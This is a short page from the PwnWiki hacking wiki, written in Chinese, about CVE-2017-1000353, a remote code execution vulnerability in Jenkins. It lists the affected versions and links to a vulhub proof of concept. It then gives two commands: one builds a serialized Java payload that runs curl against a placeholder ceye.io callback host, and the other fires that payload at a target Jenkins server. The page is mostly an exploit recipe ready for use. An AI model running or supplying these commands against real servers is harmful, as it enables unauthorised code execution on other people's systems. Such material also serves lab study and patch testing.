CVE-2017-1000353 Jenkins-CI 遠程代碼執行漏洞

From PwnWiki

Revision as of 15:57, 9 March 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎中文（繁體）‎

影響版本

Jenkins<=2.56
Jenkins LTS <= 2.46.1

POC

https://github.com/vulhub/CVE-2017-1000353

java  -jar  CVE-2017-1000353-SNAPSHOT-all.jar  jenkins_poc.ser  "curl http://xxx.ceye.io"

python exploit.py http://x.x.x.x:8080 jenkins_poc.ser

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2017-1000353_Jenkins-CI_遠程代碼執行漏洞&oldid=259"